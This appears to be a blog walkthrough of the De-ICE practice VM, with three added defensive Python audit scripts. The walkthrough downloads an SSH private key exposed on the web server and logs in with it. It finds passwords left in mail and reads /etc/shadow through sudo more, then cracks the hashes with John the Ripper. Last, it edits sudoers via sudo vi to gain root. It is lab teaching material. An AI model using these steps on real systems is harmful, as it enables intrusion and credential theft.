Continued from: Building the De-Ice III Environment – Authentication Tests and Vulnerability Scanning

Let's see what we can do with the information we found:

Index of /~pirrip//.ssh

Icon  Name                    Last modified      Size  Description

[DIR] Parent Directory                             -
[   ] id_rsa                  05-Jan-2008 20:29  1.6K
[   ] id_rsa.pub              05-Jan-2008 20:29   393

Apache/2.0.55 (Unix) PHP/5.1.2 Server at 192.168.2.101 Port 80

This is the SSH key pair of user pirrip. Most likely it was left behind on the old server by the backup taken before the system migration.

Let's download the files:

root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa.pub
--2010-06-01 02:11:32--  http://192.168.2.101/~pirrip//.ssh/id_rsa.pub
Connecting to 192.168.2.101:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 393 [text/plain]
Saving to: `id_rsa.pub'

100%[===========================================================>] 393         --.-K/s   in 0s

2010-06-01 02:11:32 (44.7 MB/s) - `id_rsa.pub' saved [393/393]

root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa
--2010-06-01 02:11:46--  http://192.168.2.101/~pirrip//.ssh/id_rsa
Connecting to 192.168.2.101:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1675 (1.6K) [text/plain]
Saving to: `id_rsa'

100%[===========================================================>] 1,675       --.-K/s   in 0s

2010-06-01 02:11:46 (172 MB/s) - `id_rsa' saved [1675/1675]

root@Sec-Track:~/De-Ice2.100# ls
id_rsa  id_rsa.pub

Once the keys are downloaded, we copy them into the /root/.ssh directory

root@Sec-Track:~/De-Ice2.100# cp id* /root/.ssh/

root@Sec-Track:~/.ssh# ls
id_rsa  id_rsa.pub  known_hosts

We confirm that the key belongs to user pirrip

root@Sec-Track:~/.ssh# more id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA1pfb/CVukUw4Xe67YLEZzVHWNax0zJjI1CfcsoEGylmm
tlA6iXHi41nLshzXu9n536JfM9LFAWGqefBVX7Bzd/fC4+jHS3q89IK9FP7gFPwEmlNHCwPX0ADxDFyB
1lJOFffJ9gVw3VgHCaCPgS70UqJD0hZFDMSDMoBa91PylFQR0m58nMq8DsGRbeC5hTdpLXKfBuW8v/lF
uNEWVWNcZDie82aiJg8WRUUIrzeGZSR3+cG1hi6za67VIi+ce8fFuBvIgaEpvJ0JSIX7zPLUV10ezW1N
QRNplKSam3TIYI3+YwuhlcgpEyliHYReN6v91+um2c6LNy9y/vx2Akci5Q== pirrip@slax

So let's connect to the target system!

root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100
The authenticity of host '192.168.2.100 (192.168.2.100)' can't be established.
RSA key fingerprint is ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.2.100' (RSA) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for '/root/.ssh/id_rsa' are too open.
It is recommended that your private key files are NOT accessible by others.
This private key will be ignored.
bad permissions: ignore key: /root/.ssh/id_rsa
pirrip@192.168.2.100's password:

As we can see, ssh rejects the key because its file permissions are too open... so let's change them:

root@Sec-Track:~/.ssh# ls -la
total 20
drwx------  2 root root 4096 Jun  1 02:18 .
drwxr-xr-x 77 root root 4096 Jun  1 02:09 ..
-r--r--r--  1 root root 1675 Jun  1 02:17 id_rsa
-r--r--r--  1 root root  393 Jun  1 02:17 id_rsa.pub
-rw-r--r--  1 root root 1768 Jun  1 02:21 known_hosts
root@Sec-Track:~/.ssh# chmod 000 id*
root@Sec-Track:~/.ssh# ls -la
total 20
drwx------  2 root root 4096 Jun  1 02:18 .
drwxr-xr-x 77 root root 4096 Jun  1 02:09 ..
----------  1 root root 1675 Jun  1 02:17 id_rsa
----------  1 root root  393 Jun  1 02:17 id_rsa.pub
-rw-r--r--  1 root root 1768 Jun  1 02:21 known_hosts
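Two things went wrong on the defender's side here: a home-directory backup containing .ssh/ ended up under a web-served UserDir, and the key file itself was world-readable (the same condition ssh complained about with "Permissions 0644"). The following audit is an added example, not code from the original post or from the De-ICE project: it walks a directory tree (a UserDir root, a backup location), reports every file carrying a PEM private-key header, and applies the same group/other permission test OpenSSH uses. The directory tree, file names and key contents it builds are constructed for the demo.

```python
"""Audit a directory tree for SSH private keys a web server could serve.

Added example (not part of the original post). Walks a tree such as an Apache
UserDir root or a backup location, reports every file that carries a PEM
private-key header, and applies the mode check ssh itself uses (any group or
other permission bit set -> key refused), so leaked and over-permissive keys
surface in one report.
"""
import os
import stat
import tempfile

PRIVATE_KEY_MARKERS = (
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
    b"-----BEGIN DSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN PRIVATE KEY-----",
)


def looks_like_private_key(path, max_read=4096):
    """True if the first bytes of the file contain a PEM private-key header."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(max_read)
    except OSError:
        return False
    return any(marker in head for marker in PRIVATE_KEY_MARKERS)


def key_mode_too_open(mode):
    """Mirror OpenSSH's check: any group or other permission bit -> too open."""
    return bool(mode & (stat.S_IRWXG | stat.S_IRWXO))


def find_exposed_keys(root):
    """Return one finding per private key found under `root`, sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not looks_like_private_key(path):
                continue
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            findings.append({
                "path": os.path.relpath(path, root),
                "mode": f"{mode:04o}",
                "world_readable": bool(mode & stat.S_IROTH),
                "too_open_for_ssh": key_mode_too_open(mode),
            })
    return sorted(findings, key=lambda f: f["path"])


def build_demo_tree():
    """Constructed sample: a UserDir-style tree with a leftover .ssh backup."""
    root = tempfile.mkdtemp(prefix="userdir-audit-")
    ssh_dir = os.path.join(root, "pirrip", ".ssh")
    os.makedirs(ssh_dir)
    # Constructed placeholder, not real key material.
    fake_key = (b"-----BEGIN RSA PRIVATE KEY-----\n"
                b"CONSTRUCTED-NOT-A-REAL-KEY\n"
                b"-----END RSA PRIVATE KEY-----\n")
    key_path = os.path.join(ssh_dir, "id_rsa")
    with open(key_path, "wb") as fh:
        fh.write(fake_key)
    os.chmod(key_path, 0o644)  # the mode ssh complained about in the post
    with open(os.path.join(ssh_dir, "id_rsa.pub"), "wb") as fh:
        fh.write(b"ssh-rsa CONSTRUCTED pirrip@example\n")
    with open(os.path.join(root, "pirrip", "index.html"), "wb") as fh:
        fh.write(b"<html></html>\n")
    return root


if __name__ == "__main__":
    for finding in find_exposed_keys(build_demo_tree()):
        print(finding)
```

Run against a real UserDir root (for example /home with public_html directories, or the path the server's UserDir directive points at) the report lists every key the web server could hand out; the public key file is ignored on purpose, since only the private half is sensitive. Note that a mode of 0000 passes the ssh check, which is why the `chmod 000` above worked for root, who is not bound by file permissions.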

Now we're set... let's connect to the host

root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100
Linux 2.6.16.
pirrip@slax:~$

Very good... we are inside the target system. Now, as in every penetration test we have done so far, let's try to escalate privileges.

pirrip@slax:~$ cat /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
pirrip:x:1000:10:Philip Pirrip:/home/pirrip:/bin/bash
magwitch:x:1001:100:Abel Magwitch:/home/magwitch:/bin/bash
havisham:x:1002:100:Estella Havisham:/home/havisham:/bin/bash

We see that our user pirrip has primary group ID 10... so let's check the groups.

pirrip@slax:/tmp$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
floppy::11:root
mail::12:mail
news::13:news
uucp::14:uucp
man::15:
audio::17:
video::18:
cdrom::19:
games::20:
slocate::21:
utmp::22:
smmsp::25:smmsp
mysql::27:
rpc::32:
sshd::33:sshd
gdm::42:
shadow::43:
ftp::50:
pop::90:pop
scanner::93:
nobody::98:nobody
nogroup::99:
users::100:
console::101:

Group 10 is wheel, so we should be able to use the sudo command
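The detail worth noticing above is that the wheel line in /etc/group lists only root, yet pirrip is a wheel member because his primary GID in /etc/passwd is 10. An audit that reads only /etc/group misses exactly this case. The following is an added example, not code from the original post: it parses both files and reports admin-group members with the source of their membership. The passwd and group excerpts it uses are constructed to match the listings above.

```python
"""Report which accounts belong to an admin group, counting primary GIDs.

Added example (not part of the original post). The /etc/group line for a
group lists only supplementary members; an account whose primary GID in
/etc/passwd equals that group's GID is a member too but never appears there.
"""

# Constructed excerpts modelled on the listings above (not the lab's real files).
PASSWD_SAMPLE = """\
root:x:0:0::/root:/bin/bash
operator:x:11:0:operator:/root:/bin/bash
pirrip:x:1000:10:Philip Pirrip:/home/pirrip:/bin/bash
magwitch:x:1001:100:Abel Magwitch:/home/magwitch:/bin/bash
havisham:x:1002:100:Estella Havisham:/home/havisham:/bin/bash
"""

GROUP_SAMPLE = """\
root::0:root
wheel::10:root
users::100:
"""


def parse_passwd(text):
    """name -> {uid, gid, shell} from passwd-format text."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, _home, shell = line.split(":", 6)
        users[name] = {"uid": int(uid), "gid": int(gid), "shell": shell}
    return users


def parse_group(text):
    """name -> {gid, members} from group-format text."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = {"gid": int(gid),
                        "members": [m for m in members.split(",") if m]}
    return groups


def members_of(group_name, users, groups):
    """All accounts in `group_name`: explicit members plus primary-GID members."""
    if group_name not in groups:
        return {}
    gid = groups[group_name]["gid"]
    result = {}
    for member in groups[group_name]["members"]:
        result[member] = "supplementary"
    for name, info in users.items():
        if info["gid"] == gid:
            result[name] = "primary"  # invisible in /etc/group
    return result


def admin_group_report(passwd_text, group_text,
                       admin_groups=("wheel", "sudo", "admin")):
    """Membership of each admin group present in the group file."""
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    return {g: members_of(g, users, groups)
            for g in admin_groups if g in groups}


if __name__ == "__main__":
    for group, members in admin_group_report(PASSWD_SAMPLE, GROUP_SAMPLE).items():
        print(group, members)
```

On a live host, feed it the contents of /etc/passwd and /etc/group; the `primary` entries are the memberships that `grep wheel /etc/group` would not have shown.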

pirrip@slax:/tmp$ cat /etc/shadow
cat: /etc/shadow: Permission denied

pirrip@slax:/tmp$ sudo cat /etc/shadow

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

Unfortunately we don't know our password.

Now let's look closely at the target's kernel version and try to identify a reported vulnerability, locate an exploit for it and run it from /tmp

pirrip@slax:~$ uname -r
2.6.16
pirrip@slax:~$ cd /tmp/
You have mail in /var/mail/pirrip

To our surprise, when I changed into /tmp I got a message saying I have mail... Let's see what it's about

pirrip@slax:/tmp$ mail
mailx version nail 11.25 7/29/05.  Type ? for help.
"/var/mail/pirrip": 7 messages 7 unread
>U  1 Abel Magwitch      Sun Jan 13 23:53   21/758   Estella
U  2 Estella Havisham   Sun Jan 13 23:53   21/790   welcome to the team
U  3 Abel Magwitch      Sun Jan 13 23:53   21/885   havisham
U  4 Estella Havisham   Mon Jan 14 00:05   21/871   next month
U  5 Abel Magwitch      Mon Jan 14 00:05   21/878   vacation
U  6 Abel Magwitch      Mon Jan 14 00:05   21/925   vacation
U  7 noreply@fermion.he Mon Jan 14 00:05   30/993   Fermion Account Login Reminder
? 1
Message  1:
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:47:48 +0000
To: pirrip@slax.example.net
Subject: Estella
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Will do.

?
Message  2:
From havisham@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <havisham@slax.example.net>
From: Estella Havisham <havisham@slax.example.net>
Date: Sun, 13 Jan 2008 23:50:33 +0000
To: pirrip@slax.example.net
Subject: welcome to the team
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Thanks!  Glad to be here.

?
Message  3:
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:48:57 +0000
To: pirrip@slax.example.net
Subject: havisham
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

I set her up with an accountus servers.  I set her password to "changeme" and will swing by tomorrow and make sure she changes her pw.

?
Message  4:
From havisham@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <havisham@slax.example.net>
From: Estella Havisham <havisham@slax.example.net>
Date: Mon, 14 Jan 2008 00:03:56 +0000
To: pirrip@slax.example.net
Subject: next month
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Abel filled me in about next month.  I wanted to ask you if I can grab the week you get back for vacation?  Thanks.

?
Message  5:
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:55:41 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Hey, I'll be taking vacation the second week of next month.  Have any additional tasks that need to be taken care of in advance?

?
Message  6:
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:58:28 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Sure - so far, she's doing just fine.  I have assigned her a couple web issues and the ftp installation for 2.100.  She seems to be very comfortable, even with the new stuff.

?
Message  7:
From noreply@fermion.herot.net  Mon Jan 14 00:05:15 2008
Return-Path: <noreply@fermion.herot.net>
From: noreply@fermion.herot.net
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Fermion Account Login Reminder

Listed below are your Fermion Account login credentials.  Please let us know if you have any questions or problems.

Regards,
Fermion Support

E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st

Look at the interesting information in emails 7 and 3... our own password and havisham's!

Let's try once more to list the contents of /etc/shadow

pirrip@slax:/tmp$ sudo cat /etc/shadow

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

Sorry, user pirrip is not allowed to execute '/usr/bin/cat /etc/shadow' as root on slax.

It seems we are not allowed to run cat through sudo... so let's check which interesting and useful commands we do have...

pirrip@slax:/tmp$ sudo bash
Sorry, user pirrip is not allowed to execute '/usr/bin/bash' as root on slax.
pirrip@slax:/tmp$ sudo sh
Sorry, user pirrip is not allowed to execute '/bin/sh' as root on slax.
pirrip@slax:/tmp$ sudo ls
Sorry, user pirrip is not allowed to execute '/usr/bin/ls' as root on slax.
pirrip@slax:/tmp$ sudo nano
sudo: nano: command not found
pirrip@slax:/tmp$ sudo more
usage: more [-dflpcsu] [+linenum | +/pattern] name1 name2 ...
pirrip@slax:/tmp$ sudo vi

Perfect: even though most commands are unavailable, we do have two very important ones, more and vi. Let's see what we can do with them.

pirrip@slax:/tmp$ sudo more /etc/shadow
Password:
root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::

Great... let's take these hashes to the password cracking tool John the Ripper.

root@Sec-Track:/pentest/passwords/jtr# ./john --user=root --w=/root/passwords/verycool.lst 100.txt
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0  time: 0:00:08:49 100.00% (ETA: Tue Jun  1 04:48:21 2010)  c/s: 4526  trying: aceguero

Unfortunately we haven't recovered root's password... it is probably a complex password that isn't in our dictionary.

Putting our creativity to the test, let's see what we can do with vi run through sudo.

pirrip@slax:/tmp$ sudo vi /etc/sudoers
Password:
reading /etc/sudoers

There I modify the privileges for our user pirrip

# User privilege specification
root    ALL=(ALL) ALL
pirrip  ALL=(ALL) ALL
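The root cause on this box is the sudoers rule that limited pirrip to more and vi but still ran them as root: more reads any file (the shadow file above) and vi rewrites any file, sudoers included. The following audit is an added example, not code from the original post or from the sudo project: it parses the user-specification lines of a sudoers file and flags both unrestricted ALL grants and grants of editors or pagers. The sudoers text it checks is constructed to mirror the rules shown on this page, and the list of editor/pager names is the author's own choice for the demo.

```python
"""Flag sudoers rules that hand out more than they appear to.

Added example (not part of the original post). Parses user-specification
lines (user host=(runas) commands) and reports two risk classes seen in the
lab: an unrestricted ALL grant, and a grant limited to an interactive editor
or pager, which still lets the user read any file (more) or rewrite any
file, sudoers included (vi), as root.
"""
import re

# Constructed sample reproducing the shape of the lab's rules (not the real file).
SUDOERS_SAMPLE = """\
# User privilege specification
root    ALL=(ALL) ALL
pirrip  ALL=(ALL) /usr/bin/more, /usr/bin/vi
havisham ALL=(ALL) /usr/bin/apachectl
Defaults env_reset
"""

# Editors and pagers that read or modify arbitrary files when run as root.
# The set is the demo author's choice; extend it to match local policy.
ESCAPE_CAPABLE = {"vi", "vim", "view", "more", "less", "nano", "ed"}

RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return the user-specification rules, skipping comments and Defaults."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue  # aliases and other directives are out of scope here
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        rules.append({"who": m.group("who"), "host": m.group("host"),
                      "runas": m.group("runas") or "root", "cmds": cmds})
    return rules


def classify(rule):
    """List (command, reason) pairs for the risky commands in one rule."""
    findings = []
    for cmd in rule["cmds"]:
        if cmd == "ALL":
            findings.append((cmd, "unrestricted: equivalent to a root shell"))
            continue
        base = cmd.split()[0].rsplit("/", 1)[-1]
        if base in ESCAPE_CAPABLE:
            findings.append((cmd, "editor/pager: reads or rewrites any file as root"))
    return findings


def audit_sudoers(text):
    """who -> findings, for every non-root rule that carries a risky command."""
    report = {}
    for rule in parse_sudoers(text):
        if rule["who"] == "root":
            continue  # root's own ALL rule is expected
        hits = classify(rule)
        if hits:
            report[rule["who"]] = hits
    return report


if __name__ == "__main__":
    for who, hits in audit_sudoers(SUDOERS_SAMPLE).items():
        for cmd, reason in hits:
            print(f"{who}: {cmd}: {reason}")
```

The fix the audit points at is not to grant editors at all; where an administrator must edit a protected file, sudo's own `sudoedit` (`-e`) copies the file out, edits it as the user and writes it back, so no editor runs as root. Monitoring the sudo log for invocations of the flagged commands is the complementary detection.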

Now we have full sudo rights to run any command... including the following!

pirrip@slax:/tmp$ sudo passwd root
Changing password for root
Enter the new password (minimum of 5, maximum of 127 characters)
Please use a combination of upper and lower case letters and numbers.
New password: ***********
Re-enter new password: ***********
Password changed.

Now all that's left is:

pirrip@slax:/tmp$ su
Password: ***********
root@slax:/tmp#

In the next post we'll look at some other ways to compromise this system...

One Response to "Building the De-Ice III Environment – System Access and Privilege Escalation"

  1. swordead says:

    Very clever, congratulations
